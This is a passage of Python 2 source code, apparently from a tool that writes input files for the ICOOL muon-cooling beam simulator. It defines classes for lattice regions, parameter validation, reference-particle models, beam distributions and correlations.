'req': False,
'default': 3.35},
'wangc': {
'desc': 'Wang parameter C',
'doc': '',
'type': 'Real',
'req': False,
'default': 1.22},
'wangd': {
'desc': 'Wang parameter D',
'doc': '',
'type': 'Real',
'req': False,
'default': 4.66},
'wangpmx': {
'desc': 'Wang parameter pMAX (1.500) The sign of this quantity is used to select '
'π+ or π- production.',
'doc': '',
'type': 'Real',
'req': False,
'default': 1.5},
'wangfmx': {
'desc': 'The maximum value of the Wang differential cross section',
'doc': '',
'type': 'Real',
'req': False,
'default': 13.706},
}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
class Nhs(ICoolNameListContainer):
allowed_enclosed_commands = []
command_params = {}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
class Nsc(ICoolNameListContainer):
allowed_enclosed_commands = []
command_params = {}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
class Nzh(ICoolNameListContainer):
allowed_enclosed_commands = []
command_params = {}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
class Nrh(ICoolNameListContainer):
allowed_enclosed_commands = []
command_params = {}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
class Nem(ICoolNameListContainer):
allowed_enclosed_commands = []
command_params = {}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
class Ncv(ICoolNameListContainer):
allowed_enclosed_commands = []
command_params = {}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
class Region(ICoolObject):
def __init__(self, kwargs):
ICoolObject.__init__(self, kwargs)
def __call__(self, **kwargs):
ICoolObject.__call__(self, kwargs)
def __str__(self):
return '[A Region can be either a RegularRegion or PseudoRegion.]'
def __repr__(self):
return '[A Region can be either a RegularRegion or PseudoRegion.]'
def __setattr__(self, name, value):
ICoolObject.__setattr__(self, name, value)
def gen_for001(self, file):
if hasattr(self, 'begtag'):
print 'Writing begtag'
file.write(self.get_begtag())
file.write('\n')
parm = self.gen_parm()
splits = self.get_line_splits()
count = 0
split_num = 0
cur_split = splits[split_num]
for command in parm:
if count == cur_split:
file.write('\n')
count = 0
split_num = split_num + 1
cur_split = splits[split_num]
print 'Command is: ', command
if hasattr(command, 'gen_for001'):
command.gen_for001(file)
else:
file.write(self.for001_str_gen(command))
file.write(' ')
count = count + 1
file.write('\n')
class RegularRegion(Region):
"""
RegularRegion commands include: SECTION, BEGS, REPEAT, CELL, SREGION, ENDREPEAT, ENDCELL,
and ENDCELL.
"""
def __init__(self, kwargs):
Region.__init__(self, kwargs)
def __str__(self):
return '[A RegularRegion can be either a SECTION, BEGS, REPEAT, CELL, SREGION, ENDREPEAT, ENDCELL,\
or ENDCELL.]'
def __repr__(self):
return '[A RegularRegion can be either a SECTION, BEGS, REPEAT, CELL, SREGION, ENDREPEAT, ENDCELL,\
or ENDCELL.]'
class PseudoRegion(Region):
"""
PseudoRegion commands include: APERTURE, CUTV, DENP, DENS, DISP, DUMMY, DVAR, EDGE, GRID
OUTPUT, REFP, REF2, RESET, RKICK, ROTATE, TAPER, TILT, TRANSPORT, BACKGROUND, BFIELD, ENDB, ! or &
"""
def __init__(self, kwargs):
Region.__init__(self, kwargs)
def __str__(self):
return '[A PseudoRegion can be either a APERTURE, CUTV, DENP, DENS, DISP, DUMMY, DVAR, EDGE, GRID\
OUTPUT, REFP, REF2, RESET, RKICK, ROTATE, TAPER, TILT, TRANSPORT, BACKGROUND, BFIELD, ENDB, ! or &]'
def __repr__(self):
return '[A PseudoRegion can be either a APERTURE, CUTV, DENP, DENS, DISP, DUMMY, DVAR, EDGE, GRID\
OUTPUT, REFP, REF2, RESET, RKICK, ROTATE, TAPER, TILT, TRANSPORT, BACKGROUND, BFIELD, ENDB, ! or &]'
class RegularRegionContainer(RegularRegion, Container):
def gen_for001(self, file):
# self.gen_begtag(file)
# if hasattr(self, 'begtag'):
# print 'Writing begtag'
# file.write(self.get_begtag())
# file.write('\n')
Region.gen_for001(self, file)
Container.gen_for001(self, file)
# self.gen_endtag(file)
if hasattr(self, 'endtag'):
file.write(self.get_endtag())
file.write('\n')
class Section(RegularRegionContainer):
"""
SECTION Start of cooling section region definition.
The data must end with an ENDSECTION. It can enclose any number of other commands.
If it is desired to repeat the section definitions, the control variable NSECTIONS should be
set >1 and a BEGS command is used to define where to start repeating.
"""
begtag = 'SECTION'
endtag = 'ENDSECTION'
num_params = 0
for001_format = {'line_splits': [0]}
allowed_enclosed_commands = [
'Begs',
'Repeat',
'Cell',
'Background',
'SRegion',
'Aperture',
'Cutv',
'Dens',
'Disp',
'Dummy',
'DVar',
'Edge',
'Output',
'Refp',
'Ref2',
'Reset',
'RKick',
'Rotate',
'Tilt',
'Transport',
'Comment'
'Repeat']
command_params = {
}
def __init__(self, **kwargs):
RegularRegion.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
def __str__(self):
return_str = 'SECTION\n'
return_str += str(Container.__str__(self))
return_str += 'END_SECTION\n'
return return_str
def __repr__(self):
return 'Section\n'
class Begs(RegularRegion):
def __init__(self):
RegularRegion.__init(self, None, None)
def gen(self, file):
file.write('\n')
file.write('BEGS')
class Repeat(RegularRegionContainer):
"""
Start of a repeating group of region commands; the data must end with an ENDREPEAT
command. This can be used to repeat regions inside a cell. The repeat loop can enclose any
number of {SREGION, APERTURE, DENS, DISP, DUMMY, DVAR, EDGE, OUTPUT, REFP, REF2, RESET, RKICK,
ROTATE, TILT, TRANSPORT} commands. Repeat sections cannot be nested in other repeat sections.
(see parameters below)
"""
begtag = 'REPEAT'
endtag = 'ENDREPEAT'
num_params = 1
for001_format = {'line_splits': [1]}
optional_params = { #Not implemented yet
'enclosed': {'desc': 'Enclosed commands',
'doc': 'Must be one of allowed_enclosed_commands',
'type': ''}
}
command_params = {
'nrep': {'desc': '# of times to repeat following region commands',
'doc': '',
'type': 'Integer',
'req': True,
'pos': 1}
}
allowed_enclosed_commands = [
'SRegion',
'Aperture',
'Dens',
'Disp',
'Dummy',
'Dvar',
'Edge',
'Output',
'Refp',
'Ref2',
'Reset',
'Rkick',
'Rotate',
'Tilt',
'Transport']
# Used to add wrapped SRegion object. Will wrap object SRegion in Repeat with nrep = slen/outstep and generate
# a new SRegion With slen=outstep. Need to implement exception handling for types.
@classmethod
def wrapped_sreg(cls, **kwargs):
sreg = kwargs['sreg']
outstep = kwargs['outstep']
sreg_copy = copy.deepcopy(sreg)
nrep = int(sreg.slen/outstep)
sreg_copy.slen = outstep
r = cls(nrep=nrep)
output = Output()
r.add_enclosed_command(output)
r.add_enclosed_command(sreg_copy)
return r
def __init__(self, **kwargs):
RegularRegion.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
def __str__(self):
return_str = 'REPEAT\n' + str(Container.__str__(self)) + 'ENDREPEAT\n'
return return_str
def __repr__(self):
return 'Repeat\n'
def gen(self, file):
file.write('REPEAT')
Container.gen(self, file)
file.write('ENDREPEAT')
file.write('/n')
class Background(PseudoRegion):
def __init__(self, name=None, metadata=None):
PseudoRegion.__init__(self, name, metadata)
class Bfield(PseudoRegion):
def __init__(self, name=None, metadata=None):
PseudoRegion.__init__(self, name, metadata)
class Edge(PseudoRegion):
"""EDGE Fringe field and other kicks for hard-edged field models
1) edge type (A4) {SOL, DIP, HDIP, DIP3, QUAD, SQUA, SEX, BSOL, FACE}
2.1) model # (I) {1}
2.2-5) p1, p2, p3,p4 (R) model-dependent parameters
Edge type = SOL
p1: BS [T]
If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the exit edge.
Edge type = DIP
p1: BY [T]
Edge type = HDIP
p1: BX [T]
Edge type = DIP3
p1: rotation angle [deg]
p2: BY0 [T]
p3: flag 1:in 2:out
Edge type = QUAD
p1: gradient [T/m]
Edge type = SQUA
p1: gradient [T/m]
Edge type = SEX
p1: b2 [T/m2] (cf. C. Wang & L. Teng, MC 207)
Edge type = BSOL
p1: BS [T]
p2: BY [T]
p3: 0 for entrance face, 1 for exit face
Edge type = FACE
This gives vertical focusing from rotated pole faces.
p1: pole face angle [deg]
p2: radius of curvature of reference particle [m]
p3: if not 0 => correct kick by factor 1/(1+delta)
p4: if not 0 ==> apply horizontal focus with strength = (-vertical strength)
If a FACE command is used before and after a sector dipole (DIP), you can approximate a rectangular dipole field.
The DIP, HDIP, QUAD, SQUA, SEX and BSOL edge types use Scott Berg's HRDEND routine to find the change in transverse
position and transverse momentum due to the fringe field.
"""
def __init__(
self,
edge_type,
model,
model_parameters_list,
name=None,
metadata=None):
PseudoRegion.__init__(self, name, metadata)
self.edge_type = edge_type
self.model = model
self.model_parameters = model_parameters
class Cell(RegularRegionContainer):
"""CELL Start of a repeating group of region commands; the data must end with an ENDCELL command.
The cell loop can enclose any number of commands under REPEAT plus REPEAT and ENDREPEAT commands.
It has an associated cell field, which is superimposed on the individual region fields. Cell sections cannot
be nested in other cell sections. (see parameters below)
"""
begtag = 'CELL'
endtag = 'ENDCELL'
num_params = 3
for001_format = {'line_splits': [1, 1, 1]}
allowed_enclosed_commands = [
'SRegion',
'Aperture',
'Dens',
'Disp',
'Dummy',
'DVar',
'Edge',
'Output',
'Refp',
'Ref2',
'Reset',
'RKick',
'Rotate',
'Tilt',
'Transport',
'Repeat']
command_params = {
'ncells': {
'desc': 'Number of times to repeat this command in this cell block',
'doc': '',
'type': 'Integer',
'req': True,
'pos': 1},
'flip': {
'desc': 'if .true. => flip cell field for alternate cells',
'doc': '',
'type': 'Logical',
'req': True,
'pos': 2},
'field': {
'desc': 'Field object',
'doc': '',
'type': 'Field',
'req': True,
'pos': 3},
}
def __init__(self, **kwargs):
RegularRegion.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
def __str__(self):
return_str = 'CELL\n' + str(Container.__str__(self)) + 'ENDCELL\n'
# for command in self.enclosed_commands:
# return_str += str(command)
return return_str
def __repr__(self):
return 'Cell\n'
class SRegion(RegularRegionContainer):
"""
SREGION - Start of new s-region. Describes field and material properties.
Parameters:
1.1) SLEN (R) Length of this s region [m]
1.2) NRREG (I) # of radial subregions of this s region {1-4}
1.3) ZSTEP (R) step for tracking particles [m]
Note that for fixed-stepping the program may modify this value slightly to get
an integral number of steps in the region.
The following parameters are repeated for each r subregion:
2.1) IRREG (I) r-region number
2.2) RLOW (R) Inner radius of this r subregion[m]
2.3) RHIGH (R) Outer radius of this r subregion[m]
3) FTAG (A4) Tag identifying field in this r subregion
(See specific field type below)
4) FPARM (R) 15 parameters describing field (see specific field type below)
These 15 parameters must be on one input line.
5) MTAG (2A4) Tag identifying material composition in this r subregion
The wedge geometry can accept a second MTAG parameter.
The first material refers to the interior of the wedge.
The second material, if present, refers to the exterior of the wedge.
If a second MTAG parameter is not present, vacuum is assumed. (see specific material type below)
6) MGEOM (A6) Tag identifying material geometry in this r subregion.
(see specific material type below)
7) GPARM (R) 10 Parameters describing material geometry.
These 10 parameters must be on one input line (see specific material type below)
"""
allowed_enclosed_commands = ['SubRegion']
begtag = 'SREGION'
endtag = ''
num_params = 3
for001_format = {'line_splits': [3]}
command_params = {
'slen': {
'desc': 'Length of this s region [m]',
'doc': '',
'type': 'Real',
'req': True,
'pos': 1},
'nrreg': {
'desc': '# of radial subregions of this s region {1-4}',
'doc': '',
'type': 'Int',
'min': 1,
'max': 4,
'req': True,
'pos': 2},
'zstep': {
'desc': 'Step for tracking particles [m]',
'doc': '',
'type': 'Real',
'req': True,
'pos': 3},
#'outstep': {
# 'desc': 'Step for generating OUTPUT commands within SRegion.',
# 'doc': 'Will wrap SRegion in REPEAT/ENDREPEAT statements.',
# 'type': 'Real',
# 'req': False,
# 'pos': None}
}
def __init__(self, **kwargs):
RegularRegion.__init__(self, kwargs)
Container.__init__(self)
def __str__(self):
ret_str = 'SRegion:\n' + 'slen=' + str(self.slen) + '\n' + 'nrreg=' + str(self.nrreg) + '\n' + \
'zstep=' + str(self.zstep) + '\n' + str(Container.__str__(self))
return ret_str
def __repr__(self):
return 'SRegion:\n ' + 'slen=' + \
str(self.slen) + '\n' + 'nrreg=' + str(self.nrreg) + \
'\n' + 'zstep=' + str(self.zstep)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
def add_subregion(self, subregion):
try:
if self.check_type('SubRegion', subregion):
if not hasattr(self, 'subregions'):
self.subregions = []
self.subregions.append(subregion)
else:
raise ie.InvalidType('SubRegion', subregion.__class__.__name__)
except ie.InvalidType as e:
print e
def add_subregions(self, subregion_list):
for subregion in subregion_list:
self.subregions.append(subregion)
"""def gen_for001(self, file):
if hasattr(self, 'outstep'):
sreg_copy = copy.deepcopy(self)
delattr(sreg_copy, 'outstep')
sreg_copy.slen = self.outstep
nrep = int(self.slen/self.outstep)
r = Repeat(nrep=nrep)
r.add_enclosed_command(sreg_copy)
r.gen_for001(file)
else:
RegularRegionContainer.gen_for001(self, file)"""
class SubRegion(RegularRegion):
"""
A SubRegion is a:
(1) IRREG r-region number;
(2) RLOW Innter radius of this r subregion;
(3) RHIGH Outer radius of this r subregion;
(4) Field object; and
(5) Material object.
"""
num_params = 5
for001_format = {'line_splits': [3, 1, 1]}
command_params = {
'irreg': {'desc': 'R-Region Number',
'doc': '',
'type': 'Integer',
'req': True,
'pos': 1},
'rlow': {'desc': 'Inner radius of this r subregion',
'doc': '',
'type': 'Real',
'req': True,
'pos': 2},
'rhigh': {'desc': 'Outer radius of this r subregion',
'doc': '',
'type': 'Real',
'req': True,
'pos': 3},
'field': {'desc': 'Field object',
'doc': '',
'type': 'Field',
'req': True,
'pos': 4},
'material': {'desc': 'Material object',
'doc': '',
'type': 'Material',
'req': True,
'pos': 5}
}
def __init__(self, **kwargs):
RegularRegion.__init__(self, kwargs)
def __str__(self):
return 'SubRegion:\n' + 'irreg=' + str(self.irreg) + '\n' + 'rlow=' + str(self.rlow) + '\n' + \
'rhigh=' + str(self.rhigh) + '\n' + 'Field=' + \
str(self.field) + '\n' + \
'Material=' + str(self.material)
def __repr__(self):
return 'SubRegion:\n' + 'irreg=' + str(self.irreg) + '\n' + 'rlow=' + str(self.rlow) + '\n' + \
'rhigh=' + str(self.rhigh) + '\n' + 'Field=' + \
str(self.field) + '\n' + \
'Material=' + str(self.material)
def __setattr__(self, name, value):
Region.__setattr__(self, name, value)
class ModeledCommandParameter(ICoolObject):
def __init__(self, kwargs):
"""
Checks to see whether all required parameters are specified. If not, raises exception and exits.
"""
if self.check_command_params_init(kwargs) is False:
sys.exit(0)
else:
if self.check_no_model():
return
else:
setattr(
self,
self.get_model_descriptor_name(),
self.get_model_name_in_dict(kwargs))
del kwargs[self.get_model_descriptor_name()]
self.setall(kwargs)
def __call__(self, kwargs):
if self.check_command_params_call(kwargs) is False:
sys.exit(0)
else:
if not self.get_model_descriptor_name() in kwargs.keys():
ICoolObject.__call__(self, kwargs)
else:
setattr(
self,
self.get_model_descriptor_name(),
self.get_model_name_in_dict(kwargs))
del kwargs[self.get_model_descriptor_name()]
self.setall(kwargs)
def __setattr__(self, name, value):
# Check whether the attribute being set is the model
if name == self.get_model_descriptor_name():
if self.check_valid_model(value) is False:
return
new_model = False
# Check whether this is a new model (i.e. model was previously
# defined)
if hasattr(self, self.get_model_descriptor_name()):
new_model = True
# Delete all attributes of the current model
print 'Resetting model to ', value
self.reset_model()
object.__setattr__(self, self.get_model_descriptor_name(), value)
# If new model, set all attributes of new model to 0.
if new_model is True:
self.set_and_init_params_for_model(value)
return
try:
if self.check_command_param(name):
if self.check_command_param_type(name, value):
object.__setattr__(self, name, value)
else:
raise ie.SetAttributeError('', self, name)
except ie.InvalidType as e:
print e
except ie.SetAttributeError as e:
print e
def __str__(self):
desc = 'ModeledCommandParameter\n'
for key in self.get_model_dict(
getattr(
self,
self.get_model_descriptor_name())):
desc = desc + key + ': ' + str(getattr(self, key)) + '\n'
return desc
def set_keyword_args_model_specified(self, kwargs):
setattr(
self,
self.get_model_descriptor_name(),
kwargs[
self.get_model_descriptor_name()])
for key in kwargs:
if not key == self.get_model_descriptor_name():
setattr(self, key, kwargs[key])
def set_keyword_args_model_not_specified(self, kwargs):
for key in kwargs:
object.__setattr__(self, key, kwargs[key])
def reset_model(self):
for key in self.get_model_parms_dict():
if hasattr(self, key):
delattr(self, key)
def set_and_init_params_for_model(self, model):
for key in self.get_model_dict(model):
if key is not self.get_model_descriptor_name():
setattr(self, key, 0)
def check_command_params_init(self, command_params):
"""
Checks if ALL keywords for a model are specified. If not, raises InputArgumentsError.
If model is not specified, raises ModelNotSpecifiedError.
Initialization of a model (e.g., Accel, SOL, etc. requires all keywords specified)
"""
if self.check_no_model():
return True
if not self.check_model_specified(command_params):
return False
else:
if not self.check_valid_model(
self.get_model_name_in_dict(command_params)):
return False
else:
command_params_dict = self.get_command_params_for_specified_input_model(
command_params)
if not self.check_command_params_valid(command_params, command_params_dict) \
or not self.check_all_required_command_params_specified(command_params, command_params_dict) \
or not self.check_command_params_type(command_params, command_params_dict):
return False
else:
return True
def check_command_params_call(self, command_params):
"""
Checks to see whether new model specified in call.
If so, checks that the parameters specified correspond to that model and raises an exception if they dont.
Does NOT require all parameters specified for new model. Unspecified parameters are set to 0.
If model is not specified, checks whether the parameters specified correspond to the current model and
raises an exception otherwise.
"""
if not self.get_model_descriptor_name() in command_params.keys():
command_params_dict = self.get_model_parms_dict()
if not self.check_command_params_valid(command_params, command_params_dict) \
or not self.check_command_params_type(command_params, command_params_dict):
return False
else:
return True
else:
return self.check_command_params_init(command_params)
def check_valid_model(self, model):
"""
Checks whether model specified is valid.
If model is not valid, raises an exception and returns False. Otherwise returns True.
"""
try:
if not str(model) in self.get_model_names():
raise ie.InvalidModel(str(model), self.get_model_names())
except ie.InvalidModel as e:
print e
return False
return True
def check_partial_keywords_for_current_model(self, input_dict):
"""
Checks whether the keywords specified for a current model correspond to that model.
"""
actual_dict = self.get_model_dict(
getattr(
self,
self.get_model_descriptor_name()))
for key in input_dict:
if key not in actual_dict:
raise ie.InputArgumentsError(
'Input Arguments Error',
input_dict,
actual_dict)
return True
def check_partial_keywords_for_new_model(self, input_dict):
"""
Checks whether the keywords specified for a new model correspond to that model.
"""
model = input_dict[self.get_model_descriptor_name()]
actual_dict = self.get_model_dict(model)
for key in input_dict:
if key not in actual_dict:
raise ie.InputArgumentsError(
'Input Arguments Error',
input_dict,
actual_dict)
return True
def check_model_specified(self, input_dict):
"""
Check whether the user specified a model in specifying parameters to Init or Call.
if so, returns True. Otherwise, raises an exception and returns False.
"""
try:
if not self.get_model_descriptor_name() in input_dict.keys():
raise ie.ModelNotSpecified(self.get_model_names())
except ie.ModelNotSpecified as e:
print e
return False
return True
def check_no_model(self):
if self.get_model_descriptor_name() is None:
return True
else:
return False
# Helper functions
##################################################
def get_model_descriptor(self):
"""Returns the model descriptor dictionary"""
return self.models['model_descriptor']
def get_model_descriptor_name(self):
"""
The model descriptor name is an alias name for the term 'model', which is specified for each descendent class.
Returns the model descriptor name.
"""
return self.get_model_descriptor()['name']
def get_current_model_name(self):
"""Returns the name of the current model"""
return getattr(self, self.get_model_descriptor_name())
def get_model_parms_dict(self):
"""
Returns the parameter dictionary for the current model.
"""
if self.get_model_descriptor_name() is None:
return {}
else:
return self.get_model_dict(self.get_current_model_name())
def get_model_dict(self, model):
"""
Returns the parameter dictionary for model name.
"""
return self.models[str(model)]['parms']
def get_num_params(self):
"""
Returns the number of parameters for model.
"""
return self.get_model_descriptor()['num_parms']
def get_icool_model_name(self):
"""Check to see whether there is an alternate icool_model_name from the common name.
If so return that. Otherwise, just return the common name."""
if 'icool_model_name' not in self.models[
str(self.get_current_model_name())]:
return self.get_current_model_name()
else:
return self.models[str(self.get_current_model_name())][
'icool_model_name']
def get_model_names(self):
"""Returns a list of all model names"""
ret_list = self.models.keys()
pos = ret_list.index('model_descriptor')
del ret_list[pos]
return ret_list
def get_model_name_in_dict(self, dict):
"""Returns the model name in a provided dictionary if it exists. Otherwise returns None"""
if self.get_model_descriptor_name() not in dict:
return None
else:
return dict[self.get_model_descriptor_name()]
def get_command_params(self):
return self.get_model_parms_dict()
def get_command_params_for_specified_input_model(
self,
input_command_params):
specified_model = input_command_params[
self.get_model_descriptor_name()]
return self.get_model_dict(specified_model)
def get_line_splits(self):
return self.models['model_descriptor']['for001_format']['line_splits']
##################################################
def set_model_parameters(self):
parms_dict = self.get_model_parms_dict()
high_pos = 0
for key in parms_dict:
if key['pos'] > high_pos:
high_pos = key['pos']
self.parms = [0] * high_pos
def gen_parm(self):
num_parms = self.get_num_params()
command_params = self.get_command_params()
parm = [0] * num_parms
for key in command_params:
pos = int(command_params[key]['pos']) - 1
if key == self.get_model_descriptor_name():
val = self.get_icool_model_name()
print 'Using icool name', val
else:
val = getattr(self, key)
parm[pos] = val
print parm
return parm
def gen_for001(self, file):
if hasattr(self, 'begtag'):
print 'Writing begtag'
# file.write('\n')
file.write(self.get_begtag())
file.write('\n')
parm = self.gen_parm()
splits = self.get_line_splits()
count = 0
split_num = 0
cur_split = splits[split_num]
for i in parm:
if count == cur_split:
file.write('\n')
count = 0
split_num = split_num + 1
cur_split = splits[split_num]
file.write(str(i))
file.write(' ')
count = count + 1
file.write('\n')
if hasattr(self, 'endtag'):
print 'Writing endtag'
file.write('\n')
file.write(self.get_endtag())
file.write('\n')
class Refp(ModeledCommandParameter, PseudoRegion):
"""
Reference particle
"""
begtag = 'REFP'
endtag = ''
models = {
'model_descriptor': {'desc': 'Phase model',
'name': 'phmodref',
'num_parms': 5,
'for001_format': {'line_splits': [5]}},
'0_crossing':
{'desc': '0-crossing phase iterative procedure',
'doc': 'Uses iterative procedure to find 0-crossing phase; tracks through all regions. Only works with ACCEL modesl 1,2 and 13.',
'icool_model_name': 2,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''}}},
'const_v':
{'desc': 'Assumes constant reference particle velocity',
'doc': 'Applies to any region',
'icool_model_name': 3,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''},
'pz0': {'pos': 2, 'type': 'Real', 'doc': ''},
't0': {'pos': 3, 'type': 'Real', 'doc': ''}}},
'en_loss':
{'desc': 'Assumes constant reference particle velocity',
'doc': 'Applies to any region',
'icool_model_name': 4,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''},
'pz0': {'pos': 2, 'type': 'Real', 'doc': ''},
't0': {'pos': 3, 'type': 'Real', 'doc': ''},
'dedz': {'pos': 4, 'type': 'Real', 'doc': ''}}},
'delta_quad_cav':
{'desc': 'Assumes constant reference particle velocity',
'doc': 'Applies to any region',
'icool_model_name': 5,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''},
'e0': {'pos': 2, 'type': 'Real', 'doc': ''},
'dedz': {'pos': 3, 'type': 'Real', 'doc': ''},
'd2edz2': {'pos': 4, 'type': 'Real', 'doc': ''}}},
'delta_quad_any':
{'desc': 'Assumes constant reference particle velocity',
'doc': 'Applies to any region',
'icool_model_name': 6,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''},
'e0': {'pos': 2, 'type': 'Real', 'doc': ''},
'dedz': {'pos': 3, 'type': 'Real', 'doc': ''},
'd2edz2': {'pos': 4, 'type': 'Real', 'doc': ''}}},
}
def __init__(self, **kwargs):
ModeledCommandParameter.__init__(self, kwargs)
def __call__(self, **kwargs):
ModeledCommandParameter.__call__(self, kwargs)
def __setattr__(self, name, value):
ModeledCommandParameter.__setattr__(self, name, value)
def __str__(self):
return ModeledCommandParameter.__str__(self)
class Distribution(ModeledCommandParameter):
"""
A Distribution is a:
(1) bdistyp (I) beam distribution type {1:Gaussian 2:uniform circular segment}
(2-13) 12 Parameters for bdistyp
"""
models = {
'model_descriptor': {'desc': 'Distribution type',
'name': 'bdistyp',
'num_parms': 13,
'for001_format': {'line_splits': [1, 6, 6]}},
'gaussian':
{'desc': 'Gaussian beam distribution',
'doc': '',
'icool_model_name': 1,
'parms':
{'bdistyp': {'pos': 1, 'type': 'String', 'doc': ''},
'x_mean': {'pos': 2, 'type': 'Real', 'doc': ''},
'y_mean': {'pos': 3, 'type': 'Real', 'doc': ''},
'z_mean': {'pos': 4, 'type': 'Real', 'doc': ''},
'px_mean': {'pos': 5, 'type': 'Real', 'doc': ''},
'py_mean': {'pos': 6, 'type': 'Real', 'doc': ''},
'pz_mean': {'pos': 7, 'type': 'Real', 'doc': ''},
'x_std': {'pos': 8, 'type': 'Real', 'doc': ''},
'y_std': {'pos': 9, 'type': 'Real', 'doc': ''},
'z_std': {'pos': 10, 'type': 'Real', 'doc': ''},
'px_std': {'pos': 11, 'type': 'Real', 'doc': ''},
'py_std': {'pos': 12, 'type': 'Real', 'doc': ''},
'pz_std': {'pos': 13, 'type': 'Real', 'doc': ''}}},
'uniform':
{'desc': 'Uniform circular segment beam distribution',
'doc': '',
'icool_model_name': 2,
'parms':
{'bdistyp': {'pos': 1, 'type': 'String', 'doc': ''},
'r_low': {'pos': 2, 'type': 'Real', 'doc': ''},
'r_high': {'pos': 3, 'type': 'Real', 'doc': ''},
'phi_low': {'pos': 4, 'type': 'Real', 'doc': ''},
'phi_high': {'pos': 5, 'type': 'Real', 'doc': ''},
'z_low': {'pos': 6, 'type': 'Real', 'doc': ''},
'z_high': {'pos': 7, 'type': 'Real', 'doc': ''},
'pr_low': {'pos': 8, 'type': 'Real', 'doc': ''},
'pr_high': {'pos': 9, 'type': 'Real', 'doc': ''},
'pphi_low': {'pos': 10, 'type': 'Real', 'doc': ''},
'pphi_high': {'pos': 11, 'type': 'Real', 'doc': ''},
'pz_low': {'pos': 12, 'type': 'Real', 'doc': ''},
'pz_high': {'pos': 13, 'type': 'Real', 'doc': ''}}},
}
def __init__(self, **kwargs):
ModeledCommandParameter.__init__(self, kwargs)
def __call__(self, **kwargs):
ModeledCommandParameter.__call__(self, kwargs)
def __setattr__(self, name, value):
ModeledCommandParameter.__setattr__(self, name, value)
def __str__(self):
return ModeledCommandParameter.__str__(self)
class Correlation(ModeledCommandParameter):
"""
A Correlation is a:
(1) CORRTYP (I) correlation type
(2) CORR1(i) (R) correlation parameter 1
(3) CORR2(i) (R) correlation parameter 2
(4) CORR3(i) (R) correlation parameter 3
"""
models = {
'model_descriptor': {
'desc': 'Correlation type',
'name': 'corrtyp',
'num_parms': 4,
'for001_format': {
'line_splits': [4]}
},
'ang_mom': {
'desc': 'Angular momentum appropriate for constant solenoid field',
'doc': '',
'icool_model_name': 1,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'sol_field': {
'pos': 2, 'type': 'Real', 'doc': ''}}},
'palmer': {
'desc': 'Palmer amplitude correlation',
'doc': '', 'icool_model_name': 2,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'strength': {
'pos': 2, 'type': 'Real', 'doc': ''},
'beta_eff': {
'pos': 3, 'type': 'Real', 'doc': ''}}},
'rf_bucket_ellipse': {
'desc': 'Rf bucket, small amplitude ellipse',
'doc': '', 'icool_model_name': 3,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'e_peak': {
'pos': 2, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 3, 'type': 'Real', 'doc': ''},
'freq': {
'pos': 4, 'type': 'Real', 'doc': ''}}},
'rf_bucket_small_separatrix': {
'desc': 'Rf bucket, small amplitude separatrix',
'doc': '', 'icool_model_name': 4,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'e_peak': {
'pos': 2, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 3, 'type': 'Real', 'doc': ''},
'freq': {
'pos': 4, 'type': 'Real', 'doc': ''}}},
'rf_bucket_large_separatrix': {
'desc': 'Rf bucket, small amplitude separatrix',
'doc': '', 'icool_model_name': 5,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'Real', 'doc': ''},
'e_peak': {
'pos': 2, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 3, 'type': 'Real', 'doc': ''},
'freq': {
'pos': 4, 'type': 'Real', 'doc': ''}}},
'twiss_px': {
'desc': 'Twiss parameters in x Px',
'doc': '',
'icool_model_name': 6,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'alpha': {
'pos': 2, 'type': 'Real', 'doc': ''},
'beta': {
'pos': 3, 'type': 'Real', 'doc': ''},
'epsilon': {
'pos': 4, 'type': 'Real', 'doc': ''}}},
'twiss_py': {
'desc': 'Twiss parameters in x Px',
'doc': 'The spread in y and Py in the beam definition are ignored. '
'For Gaussian distributions epsilon is the rms geometrical '
'emittance. For uniform distributions it specifies the limiting ellipse.',
'icool_model_name': 7,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'alpha': {
'pos': 2, 'type': 'Real', 'doc': 'Twiss alpha parameter [m]'},
'beta': {
'pos': 3, 'type': 'Real', 'doc': 'Twiss beta parameter [m]'},
'epsilon': {
